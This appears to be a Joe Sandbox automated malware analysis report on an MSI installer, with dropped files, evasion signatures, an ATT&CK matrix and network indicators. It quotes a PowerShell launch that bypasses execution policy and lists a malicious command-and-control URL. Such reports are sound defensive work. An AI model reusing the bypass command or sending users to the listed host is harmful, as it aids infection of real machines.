Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI2F50.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe

API coverage: 8.2 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7060	Thread sleep count: 3983 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7064	Thread sleep count: 1477 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: 5924ec.msi.1.dr	Binary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: obs-ffmpeg-mux.exe, 0000000B.00000002.2299398400.00007FF8A696A000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: vmncVMware Screen Codec / VMware Video @
Source: obs-ffmpeg-mux.exe, 0000000B.00000002.2299398400.00007FF8A685D000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: VMware Screen Codec / VMware Video

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe

Code function: 11_2_00007FF8A7C12D90 Start: 00007FF8A7C1300F End: 00007FF8A7C12E85

11_2_00007FF8A7C12D90

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe

Code function: 11_2_00007FF8A7C12D90 rdtsc

11_2_00007FF8A7C12D90

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe

Code function: 8_2_00007FF6FD012ECC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00007FF6FD012ECC

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe

Code function: 11_2_00007FF8A7BFED32 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,

11_2_00007FF8A7BFED32

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe	Code function: 8_2_00007FF6FD013074 SetUnhandledExceptionFilter,	8_2_00007FF6FD013074
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe	Code function: 8_2_00007FF6FD012ECC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF6FD012ECC
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe	Code function: 8_2_00007FF6FD012984 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF6FD012984
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF649AA3E04 SetUnhandledExceptionFilter,	11_2_00007FF649AA3E04
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF649AA3774 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF649AA3774
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF649AA3C5C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF649AA3C5C
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8BFB9004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF8BFB9004C
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8BFBA6CBC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00007FF8BFBA6CBC
Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Code function: 11_2_00007FF8BFBA6710 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF8BFBA6710

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss58D0.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi58CD.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr58CE.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr58CF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe "C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe"			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss58d0.ps1" -propfile "c:\users\user\appdata\local\temp\msi58cd.txt" -scriptfile "c:\users\user\appdata\local\temp\scr58ce.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr58cf.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss58d0.ps1" -propfile "c:\users\user\appdata\local\temp\msi58cd.txt" -scriptfile "c:\users\user\appdata\local\temp\scr58ce.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr58cf.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe

Code function: 8_2_00007FF6FD012DA0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_00007FF6FD012DA0

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe

Code function: 11_2_00007FF8A7C89720 GetTimeZoneInformation,GetSystemTimeAsFileTime,

11_2_00007FF8A7C89720

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Replication Through Removable Media	12 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	21 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scripting	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	11 Peripheral Device Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Setup.msi	7%	Virustotal		Browse
Setup.msi	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\BCUninstaller.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\UnRar.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-console-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\avcodec-60.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\avformat-60.dll	3%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\avutil-58.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\swresample-4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\swscale-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\utest.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\vcruntime140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\w32-pthreads.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\zlib.dll	0%	ReversingLabs
C:\Windows\Installer\MSI2E04.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI2E72.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI2EB2.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI2EF1.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI2F50.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI2F90.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI2FCF.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI4EE1.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI56B3.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://staticmaxepress.com/updater2.php	100%	Avira URL Cloud	malware
https://staticmaxepress.com/updater2.phpx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
staticmaxepress.com	172.67.162.17	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://staticmaxepress.com/updater2.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.2229301554.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2223957185.0000000004EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2223176965.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://streams.videolan.org/upload/	obs-ffmpeg-mux.exe, obs-ffmpeg-mux.exe, 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.2223957185.0000000004D71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.2223957185.0000000004EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2223176965.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.zlib.net/D	zlib.dll.1.dr	false		high
https://go.micro	powershell.exe, 00000004.00000002.2223957185.00000000051CE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.videolan.org/x264.html	obs-ffmpeg-mux.exe, 0000000B.00000002.2299398400.00007FF8A6D80000.00000002.00000001.01000000.00000008.sdmp	false		high
https://contoso.com/	powershell.exe, 00000004.00000002.2229301554.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2229301554.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000004.00000002.2229301554.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dashif.org/guidelines/trickmode	obs-ffmpeg-mux.exe, obs-ffmpeg-mux.exe, 0000000B.00000002.2292151132.00007FF8A4BAB000.00000002.00000001.01000000.0000000A.sdmp, avformat-60.dll.1.dr	false		high
https://contoso.com/Icon	powershell.exe, 00000004.00000002.2229301554.0000000005DD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.micj	Setup.msi, 5924ec.msi.1.dr	false		high
http://standards.iso.org/ittf/PubliclyAvailableStandards/MPEG-DASH_schema_files/DASH-MPD.xsd	obs-ffmpeg-mux.exe, 0000000B.00000002.2292151132.00007FF8A4BAB000.00000002.00000001.01000000.0000000A.sdmp, avformat-60.dll.1.dr	false		high
https://aka.ms/winui2/webview2download/Reload():	Setup.msi, 5924ec.msi.1.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.2223957185.0000000004D71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.2223957185.0000000004EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2223176965.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://staticmaxepress.com/updater2.phpx	Setup.msi, 5924ec.msi.1.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.162.17	staticmaxepress.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589584
Start date and time:	2025-01-12 21:29:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup.msi
Detection:	MAL
Classification:	mal72.evad.winMSI@17/88@1/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 14 Number of non-executed functions: 271
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target obs-ffmpeg-mux.exe, PID 1124 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7116 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
15:30:26	API Interceptor	4x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.162.17	setup.msi	Get hash	malicious	Unknown	Browse
	http://ti6.htinenate.com	Get hash	malicious	Unknown	Browse
	https://futurehvacindia.com/HmF/zJqRTbTA3E8NkEdNG3XSYYpT2CPHqoF9DTsq4XxUrAiFitNdJPZxAsKByKFHL2Bbj7EGed34VRP3gvaoT2ErdEZV8ZcoXh7qUKmkmsJiezE9HjtrHmhzSvnLEPpvK6Khe5ctQxfCrvAgAVcoyVijtR	Get hash	malicious	HTMLPhisher	Browse
